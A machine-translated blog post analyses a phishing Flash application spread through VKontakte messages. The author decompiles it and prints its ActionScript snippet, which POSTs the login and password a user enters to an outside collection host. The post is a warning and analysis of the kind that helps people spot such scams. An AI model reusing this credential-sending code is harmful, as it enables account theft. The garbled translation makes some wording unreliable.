On vkontakte passwords of careless users again

    Today I received a message from one of my friends, the text read:

    Prevent, Denis. Look at what a little in vkontakte - vkontakte.ru/apps.php?act=s&id=236634& ... Go ahead, soon, I really liked it! A lot of impressions, it is overflowing, inaccessible)))

    The message would go into trash, but the last sentence alerted me - they just don’t write it like that.
    I decided to see what kind of fruit ...

    Moved on the link and saw the usual application fleshevyh, it looked like this:



    After you have entered all the data form throws a message that a chat is overloaded.
    Naturally, it became interesting what kind of body movement it performs, for this I downloaded the swf file itself and fed it to Swf Decompiler. After cutting it turned out that the passes and soaps are flying POST on http://ckrack.peoplego.ru/save.php :

    1. var my_lv = new LoadVars ();
    2. var result_lv = new LoadVars ();
    3. my_lv.login_v = _root.login_txt.text;
    4. my_lv.password_v = _root.password_txt.text;
    5. my_lv.sendAndLoad (" ckrack.peoplego.ru/save.php ", result_lv, "POST");

    The careless programmer who wrote this flash drive did not even bother to insert a validation of the email address there. Apparently, he was busy writing malvari, which invites people to this same “chat”.

    PS: Passwords were stolen, stolen and will be stolen, but only one thing is surprising: are people really considered so stupid stupid, making such pathetic attempts to steal passwords?

    Also popular now: